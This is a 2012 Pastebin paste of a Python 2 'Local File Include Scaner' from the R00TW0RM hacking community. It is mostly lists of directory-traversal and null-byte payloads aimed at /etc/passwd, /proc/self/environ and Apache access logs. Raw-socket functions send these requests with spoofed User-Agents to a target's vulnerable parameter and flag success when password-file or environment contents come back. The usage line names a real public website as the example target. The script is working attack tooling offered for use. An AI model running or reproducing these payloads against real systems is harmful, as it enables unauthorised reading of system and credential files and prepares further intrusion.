Ledger Nano X - The secure hardware wallet
SHARE
TWEET

scan ver 1.1.py

parkdream1 Apr 25th, 2012 402 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #!/usr/bin/python
  2. # Author: parkdream1
  3. # Messenger: h3x4r
  4. # (c) R00TW0RM - Private Community
  5. # https://r00tw0rm.com/
  6. # Local File Include Scaner Ver. 1.1
  7. # Greets: To all members of r00tw0rm !!
  8.  
  9. import socket,sys,re,random,time,httplib
  10. from random import choice
  11.  
  12. passwd = ["/etc/passwd",
  13.         "../etc/passwd",
  14.         "../../etc/passwd",
  15.         "../../../etc/passwd",
  16.         "../../../../etc/passwd",
  17.         "../../../../../etc/passwd",
  18.         "../../../../../../etc/passwd",
  19.         "../../../../../../../etc/passwd",
  20.         "../../../../../../../../etc/passwd",
  21.         "../../../../../../../../../etc/passwd",
  22.         "../../../../../../../../../../etc/passwd",
  23.         "../../../../../../../../../../../etc/passwd",
  24.         "../../../../../../../../../../../../etc/passwd",
  25.         "../../../../../../../../../../../../../etc/passwd",
  26.         "/etc/passwd%00",
  27.         "../etc/passwd%00",
  28.         "../../etc/passwd%00",
  29.         "../../../etc/passwd%00",
  30.         "../../../../etc/passwd%00",
  31.         "../../../../../etc/passwd%00",
  32.         "../../../../../../etc/passwd%00",
  33.         "../../../../../../../etc/passwd%00",
  34.         "../../../../../../../../etc/passwd%00",
  35.         "../../../../../../../../../etc/passwd%00",
  36.         "../../../../../../../../../../etc/passwd%00",
  37.         "../../../../../../../../../../../etc/passwd%00",
  38.         "../../../../../../../../../../../../etc/passwd%00",
  39.         "../../../../../../../../../../../../../etc/passwd%00"]
  40.  
  41. environ = ["/proc/self/environ",
  42.         "../proc/self/environ",
  43.         "../../proc/self/environ",
  44.         "../../../proc/self/environ",
  45.         "../../../../proc/self/environ",
  46.         "../../../../../proc/self/environ",
  47.         "../../../../../../proc/self/environ",
  48.         "../../../../../../../proc/self/environ",
  49.         "../../../../../../../../proc/self/environ",
  50.         "../../../../../../../../../proc/self/environ",
  51.         "../../../../../../../../../../proc/self/environ",
  52.         "../../../../../../../../../../../proc/self/environ",
  53.         "../../../../../../../../../../../../proc/self/environ",
  54.         "../../../../../../../../../../../../../proc/self/environ",
  55.         "../../../../../../../../../../../../../../proc/self/environ",
  56.         "/proc/self/environ%00",
  57.         "../proc/self/environ%00",
  58.         "../../proc/self/environ%00",
  59.         "../../../proc/self/environ%00",
  60.         "../../../../proc/self/environ%00",
  61.         "../../../../../proc/self/environ%00",
  62.         "../../../../../../proc/self/environ%00",
  63.         "../../../../../../../proc/self/environ%00",
  64.         "../../../../../../../../proc/self/environ%00",
  65.         "../../../../../../../../../proc/self/environ%00",
  66.         "../../../../../../../../../../proc/self/environ%00",
  67.         "../../../../../../../../../../../proc/self/environ%00",
  68.         "../../../../../../../../../../../../proc/self/environ%00",
  69.         "../../../../../../../../../../../../../proc/self/environ%00",
  70.         "../../../../../../../../../../../../../../proc/self/environ%00"]
  71.  
  72. logs = ["/usr/local/apache2/logs/access_log",
  73.         "../usr/local/apache2/logs/access_log",
  74.         "../../usr/local/apache2/logs/access_log",
  75.         "../../../usr/local/apache2/logs/access_log",
  76.         "../../../../usr/local/apache2/logs/access_log",
  77.         "../../../../../usr/local/apache2/logs/access_log",
  78.         "../../../../../../usr/local/apache2/logs/access_log",
  79.         "../../../../../../../usr/local/apache2/logs/access_log",
  80.         "../../../../../../../../usr/local/apache2/logs/access_log",
  81.         "../../../../../../../../../usr/local/apache2/logs/access_log",
  82.         "../../../../../../../../../../usr/local/apache2/logs/access_log",
  83.         "../../../../../../../../../../../usr/local/apache2/logs/access_log",
  84.         "../../../../../../../../../../../../usr/local/apache2/logs/access_log",
  85.         "../../../../../../../../../../../../../usr/local/apache2/logs/access_log",
  86.         "../../../../../../../../../../../../../../usr/local/apache2/logs/access_log",
  87.         "/usr/local/apache2/logs/access_log%00",
  88.         "../usr/local/apache2/logs/access_log%00",
  89.         "../../usr/local/apache2/logs/access_log%00",
  90.         "../../../usr/local/apache2/logs/access_log%00",
  91.         "../../../../usr/local/apache2/logs/access_log%00",
  92.         "../../../../../usr/local/apache2/logs/access_log%00",
  93.         "../../../../../../usr/local/apache2/logs/access_log%00",
  94.         "../../../../../../../usr/local/apache2/logs/access_log%00",
  95.         "../../../../../../../../usr/local/apache2/logs/access_log%00",
  96.         "../../../../../../../../../usr/local/apache2/logs/access_log%00",
  97.         "../../../../../../../../../../usr/local/apache2/logs/access_log%00",
  98.         "../../../../../../../../../../../usr/local/apache2/logs/access_log%00",
  99.         "../../../../../../../../../../../../usr/local/apache2/logs/access_log%00",
  100.         "../../../../../../../../../../../../../usr/local/apache2/logs/access_log%00",
  101.         "../../../../../../../../../../../../../../usr/local/apache2/logs/access_log%00",
  102.         "/var/log/apache2/access.log",
  103.         "../var/log/apache2/access.log",
  104.         "../../var/log/apache2/access.log",
  105.         "../../../var/log/apache2/access.log",
  106.         "../../../../var/log/apache2/access.log",
  107.         "../../../../../var/log/apache2/access.log",
  108.         "../../../../../../var/log/apache2/access.log",
  109.         "../../../../../../../var/log/apache2/access.log",
  110.         "../../../../../../../../var/log/apache2/access.log",
  111.         "../../../../../../../../../var/log/apache2/access.log",
  112.         "../../../../../../../../../../var/log/apache2/access.log",
  113.         "../../../../../../../../../../../var/log/apache2/access.log",
  114.         "../../../../../../../../../../../../var/log/apache2/access.log",
  115.         "../../../../../../../../../../../../../var/log/apache2/access.log",
  116.         "../../../../../../../../../../../../../../var/log/apache2/access.log",
  117.         "/var/log/apache2/access.log%00",
  118.         "../var/log/apache2/access.log%00",
  119.         "../../var/log/apache2/access.log%00",
  120.         "../../../var/log/apache2/access.log%00",
  121.         "../../../../var/log/apache2/access.log%00",
  122.         "../../../../../var/log/apache2/access.log%00",
  123.         "../../../../../../var/log/apache2/access.log%00",
  124.         "../../../../../../../var/log/apache2/access.log%00",
  125.         "../../../../../../../../var/log/apache2/access.log%00",
  126.         "../../../../../../../../../var/log/apache2/access.log%00",
  127.         "../../../../../../../../../../var/log/apache2/access.log%00",
  128.         "../../../../../../../../../../../var/log/apache2/access.log%00",
  129.         "../../../../../../../../../../../../var/log/apache2/access.log%00",
  130.         "../../../../../../../../../../../../../var/log/apache2/access.log%00",
  131.         "../../../../../../../../../../../../../../var/log/apache2/access.log%00",
  132.         "/var/log/httpd/access_log",
  133.         "../var/log/httpd/access_log",
  134.         "../../var/log/httpd/access_log",
  135.         "../../../var/log/httpd/access_log",
  136.         "../../../../var/log/httpd/access_log",
  137.         "../../../../../var/log/httpd/access_log",
  138.         "../../../../../../var/log/httpd/access_log",
  139.         "../../../../../../../var/log/httpd/access_log",
  140.         "../../../../../../../../var/log/httpd/access_log",
  141.         "../../../../../../../../../var/log/httpd/access_log",
  142.         "../../../../../../../../../../var/log/httpd/access_log",
  143.         "../../../../../../../../../../../var/log/httpd/access_log",
  144.         "../../../../../../../../../../../../var/log/httpd/access_log",
  145.         "../../../../../../../../../../../../../var/log/httpd/access_log",
  146.         "../../../../../../../../../../../../../../var/log/httpd/access_log",
  147.         "/var/log/httpd/access_log%00",
  148.         "../var/log/httpd/access_log%00",
  149.         "../../var/log/httpd/access_log%00",
  150.         "../../../var/log/httpd/access_log%00",
  151.         "../../../../var/log/httpd/access_log%00",
  152.         "../../../../../var/log/httpd/access_log%00",
  153.         "../../../../../../var/log/httpd/access_log%00",
  154.         "../../../../../../../var/log/httpd/access_log%00",
  155.         "../../../../../../../../var/log/httpd/access_log%00",
  156.         "../../../../../../../../../var/log/httpd/access_log%00",
  157.         "../../../../../../../../../../var/log/httpd/access_log%00",
  158.         "../../../../../../../../../../../var/log/httpd/access_log%00",
  159.         "../../../../../../../../../../../../var/log/httpd/access_log%00",
  160.         "../../../../../../../../../../../../../var/log/httpd/access_log%00",
  161.         "../../../../../../../../../../../../../../var/log/httpd/access_log%00",
  162.         "/var/log/httpd-access.log",
  163.         "../var/log/httpd-access.log",
  164.         "../../var/log/httpd-access.log",
  165.         "../../../var/log/httpd-access.log",
  166.         "../../../../var/log/httpd-access.log",
  167.         "../../../../../var/log/httpd-access.log",
  168.         "../../../../../../var/log/httpd-access.log",
  169.         "../../../../../../../var/log/httpd-access.log",
  170.         "../../../../../../../../var/log/httpd-access.log",
  171.         "../../../../../../../../../var/log/httpd-access.log",
  172.         "../../../../../../../../../../var/log/httpd-access.log",
  173.         "../../../../../../../../../../../var/log/httpd-access.log",
  174.         "../../../../../../../../../../../../var/log/httpd-access.log",
  175.         "../../../../../../../../../../../../../var/log/httpd-access.log",
  176.         "../../../../../../../../../../../../../../var/log/httpd-access.log",
  177.         "/var/log/httpd-access.log%00",
  178.         "../var/log/httpd-access.log%00",
  179.         "../../var/log/httpd-access.log%00",
  180.         "../../../var/log/httpd-access.log%00",
  181.         "../../../../var/log/httpd-access.log%00",
  182.         "../../../../../var/log/httpd-access.log%00",
  183.         "../../../../../../var/log/httpd-access.log%00",
  184.         "../../../../../../../var/log/httpd-access.log%00",
  185.         "../../../../../../../../var/log/httpd-access.log%00",
  186.         "../../../../../../../../../var/log/httpd-access.log%00",
  187.         "../../../../../../../../../../var/log/httpd-access.log%00",
  188.         "../../../../../../../../../../../var/log/httpd-access.log%00",
  189.         "../../../../../../../../../../../../var/log/httpd-access.log%00",
  190.         "../../../../../../../../../../../../../var/log/httpd-access.log%00",
  191.         "../../../../../../../../../../../../../../var/log/httpd-access.log%00",
  192.         "/var/www/logs/access_log",
  193.         "../var/www/logs/access_log",
  194.         "../../var/www/logs/access_log",
  195.         "../../../var/www/logs/access_log",
  196.         "../../../../var/www/logs/access_log",
  197.         "../../../../../var/www/logs/access_log",
  198.         "../../../../../../var/www/logs/access_log",
  199.         "../../../../../../../var/www/logs/access_log",
  200.         "../../../../../../../../var/www/logs/access_log",
  201.         "../../../../../../../../../var/www/logs/access_log",
  202.         "../../../../../../../../../../var/www/logs/access_log",
  203.         "../../../../../../../../../../../var/www/logs/access_log",
  204.         "../../../../../../../../../../../../var/www/logs/access_log",
  205.         "../../../../../../../../../../../../../var/www/logs/access_log",
  206.         "../../../../../../../../../../../../../../var/www/logs/access_log",
  207.         "/var/www/logs/access_log%00",
  208.         "../var/www/logs/access_log%00",
  209.         "../../var/www/logs/access_log%00",
  210.         "../../../var/www/logs/access_log%00",
  211.         "../../../../var/www/logs/access_log%00",
  212.         "../../../../../var/www/logs/access_log%00",
  213.         "../../../../../../var/www/logs/access_log%00",
  214.         "../../../../../../../var/www/logs/access_log%00",
  215.         "../../../../../../../../var/www/logs/access_log%00",
  216.         "../../../../../../../../../var/www/logs/access_log%00",
  217.         "../../../../../../../../../../var/www/logs/access_log%00",
  218.         "../../../../../../../../../../../var/www/logs/access_log%00",
  219.         "../../../../../../../../../../../../var/www/logs/access_log%00",
  220.         "../../../../../../../../../../../../../var/www/logs/access_log%00",
  221.         "../../../../../../../../../../../../../../var/www/logs/access_log%0",
  222.         "/var/apache2/logs/access_log",
  223.         "../var/apache2/logs/access_log",
  224.         "../../var/apache2/logs/access_log",
  225.         "../../../var/apache2/logs/access_log",
  226.         "../../../../var/apache2/logs/access_log",
  227.         "../../../../../var/apache2/logs/access_log",
  228.         "../../../../../../var/apache2/logs/access_log",
  229.         "../../../../../../../var/apache2/logs/access_log",
  230.         "../../../../../../../../var/apache2/logs/access_log",
  231.         "../../../../../../../../../var/apache2/logs/access_log",
  232.         "../../../../../../../../../../var/apache2/logs/access_log",
  233.         "../../../../../../../../../../../var/apache2/logs/access_log",
  234.         "../../../../../../../../../../../../var/apache2/logs/access_log",
  235.         "../../../../../../../../../../../../../var/apache2/logs/access_log",
  236.         "../../../../../../../../../../../../../../var/apache2/logs/access_log",
  237.         "/var/apache2/logs/access_log%00",
  238.         "../var/apache2/logs/access_log%00",
  239.         "../../var/apache2/logs/access_log%00",
  240.         "../../../var/apache2/logs/access_log%00",
  241.         "../../../../var/apache2/logs/access_log%00",
  242.         "../../../../../var/apache2/logs/access_log%00",
  243.         "../../../../../../var/apache2/logs/access_log%00",
  244.         "../../../../../../../var/apache2/logs/access_log%00",
  245.         "../../../../../../../../var/apache2/logs/access_log%00",
  246.         "../../../../../../../../../var/apache2/logs/access_log%00",
  247.         "../../../../../../../../../../var/apache2/logs/access_log%00",
  248.         "../../../../../../../../../../../var/apache2/logs/access_log%00",
  249.         "../../../../../../../../../../../../var/apache2/logs/access_log%00",
  250.         "../../../../../../../../../../../../../var/apache2/logs/access_log%00",
  251.         "../../../../../../../../../../../../../../var/apache2/logs/access_log%00"]
  252.                
  253. user = ['Mozilla/5.0 (Windows; U; MSIE 9.0; WIndows NT 9.0; en-US))',
  254.         'Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)',
  255.         'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 7.1; Trident/5.0)',
  256.         'Mozilla/5.0 (X11; U; Linux i586; de; rv:5.0) Gecko/20100101 Firefox/5.0',
  257.         'Mozilla/5.0 (X11; U; Linux amd64; rv:5.0) Gecko/20100101 Firefox/5.0 (Debian)',
  258.         'Mozilla/5.0 (X11; U; Linux amd64; en-US; rv:5.0) Gecko/20110619 Firefox/5.0',
  259.         'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; chromeframe/12.0.742.112)',
  260.         'Opera/9.80 (X11; Linux i686; U; ru) Presto/2.8.131 Version/11.11',
  261.         'Opera/9.80 (X11; Linux i686; U; es-ES) Presto/2.8.131 Version/11.11',
  262.         'Mozilla/5.0 (Windows NT 5.1; U; en; rv:1.8.1) Gecko/20061208 Firefox/5.0 Opera 11.11']
  263.  
  264. agent = random.choice(user)
  265.  
  266. def scanpasswd():
  267.         for lfi in passwd:
  268.                 try:  
  269.                         r = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
  270.                         r.connect((target, port))
  271.                         r.send("GET /"+path+lfi+" HTTP/1.0\r\n")
  272.                         r.send("Host: "+target+"\r\n")
  273.                         r.send("User-Agent: "+agent+"\r\n\r\n")
  274.                         print "[*] Send Request Success"
  275.                         print "http://"+target+"/"+path+lfi
  276.                         page = r.recv(1024)
  277.                         fullpage = ""
  278.                         while len(page):
  279.                                 fullpage = fullpage + page
  280.                                 page = r.recv(1024)
  281.                         r.close()
  282.                 except Exception, e:
  283.                         print "[-] Cant Not Send Request"
  284.                         print e
  285.                         sys.exit(1)
  286.                 r00t = re.search("root:x:0:0:",fullpage)
  287.                 if r00t:
  288.                         print "\033[32m[*] Request Vulnerability\n"
  289.                         sys.exit(1)
  290.                 else:
  291.                         print "[-] Request Is Not Vulnerability\n"
  292.                 time.sleep(1)
  293.  
  294. def scanenviron():
  295.         for lfi1 in environ:
  296.                 try:  
  297.                         r = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
  298.                         r.connect((target, port))
  299.                         r.send("GET /"+path+lfi1+" HTTP/1.0\r\n")
  300.                         r.send("Host: "+target+"\r\n")
  301.                         r.send("User-Agent: "+agent+"\r\n\r\n")
  302.                         print "[*] Send Request Success"
  303.                         print "http://"+target+"/"+path+lfi1
  304.                         page = r.recv(1024)
  305.                         fullpage = ""
  306.                         while len(page):
  307.                                 fullpage = fullpage + page
  308.                                 page = r.recv(1024)
  309.                         r.close()
  310.                 except Exception, e:
  311.                         print "[-] Cant Not Send Request"
  312.                         print e
  313.                         sys.exit(1)
  314.                 r00t = re.search("HTTP_HOST",fullpage)
  315.                 if r00t:
  316.                         print "\033[32m[*] Request Vulnerability\n"
  317.                         sys.exit(1)
  318.                 else:
  319.                         print "[-] Request Is Not Vulnerability\n"
  320.                 time.sleep(1)
  321.  
  322. def scanlogs():
  323.         conn = httplib.HTTPConnection(target)
  324.         conn.request("HEAD","/")
  325.         for lfi2 in logs:
  326.                 try:  
  327.                         r = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
  328.                         r.connect((target, port))
  329.                         r.send("GET /"+path+lfi2+" HTTP/1.0\r\n")
  330.                         r.send("Host: "+target+"\r\n")
  331.                         r.send("User-Agent: "+agent+"\r\n\r\n")
  332.                         print "[*] Send Request Success"
  333.                         print "http://"+target+"/"+path+lfi2
  334.                         page = r.recv(1024)
  335.                         fullpage = ""
  336.                         while len(page):
  337.                                 fullpage = fullpage + page
  338.                                 page = r.recv(1024)
  339.                         r.close()
  340.                 except Exception, e:
  341.                         print "[-] Cant Not Send Request"
  342.                         print e
  343.                         sys.exit(1)
  344.                 r00t = re.search("HEAD / HTTP/1.1",fullpage)
  345.                 if r00t:
  346.                         print "\033[32m[*] Request Vulnerability\n"
  347.                         sys.exit(1)
  348.                 else:
  349.                         print "[-] Request Is Not Vulnerability\n"
  350.                 time.sleep(1)
  351.  
  352. def menu():
  353.         print "Menu:\n"
  354.         print "ID [1]"
  355.         print "[Scan /etc/passwd File]\n"
  356.         print "ID [2]"
  357.         print "[Scan Environ File]\n"
  358.         print "ID [3]"
  359.         print "[Scan Access Logs File]\n"
  360.         print "ID [4]"
  361.         print "[Exit]\n"
  362.         mess = raw_input("[*] Select ID For Start Scanner :")
  363.         if mess == "1":
  364.                 print "Scan /etc/passwd File Starting ...\n"
  365.                 scanpasswd()
  366.                 sys.exit(1)
  367.         if mess == "2":
  368.                 print "Scan /proc/self/environ File Starting ...\n"
  369.                 scanenviron()
  370.                 sys.exit(1)
  371.         if mess == "3":
  372.                 print "Scan Access Logs File Starting ...\n"
  373.                 scanlogs()
  374.                 sys.exit(1)
  375.         if mess == "4":
  376.                 print "Exiting..."
  377.                 sys.exit(1)
  378.         else:
  379.                 print "Unknow Command\n"
  380.                 print "Please rechoice ID\n"
  381.                 menu()
  382.  
  383. def banner():
  384.         print "\n"
  385.         print "****************************************************************************"
  386.         print "||                         Local File Include Scaner Ver. 1.1             ||"
  387.         print "||                                 by parkdream1                          ||"
  388.         print "||                        (c) R00TW0RM - Private Community                ||"
  389.         print "                    Fucking from "+target+" on port "+str(port)
  390.         print "****************************************************************************"
  391.         print "\n"
  392.  
  393. if __name__ == '__main__':
  394.         if len(sys.argv) != 4:
  395.                 print >>sys.stderr, "Usage:", sys.argv[0], "<Target IP> <Port> <Path>"
  396.                 print "Example: python", sys.argv[0], "playerstage.sourceforge.net 80 "+'"index.php?src="'
  397.                 sys.exit(1)
  398.  
  399.         target, port, path = sys.argv[1], int(sys.argv[2]), sys.argv[3]
  400.  
  401.         banner()
  402.         menu()
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
Top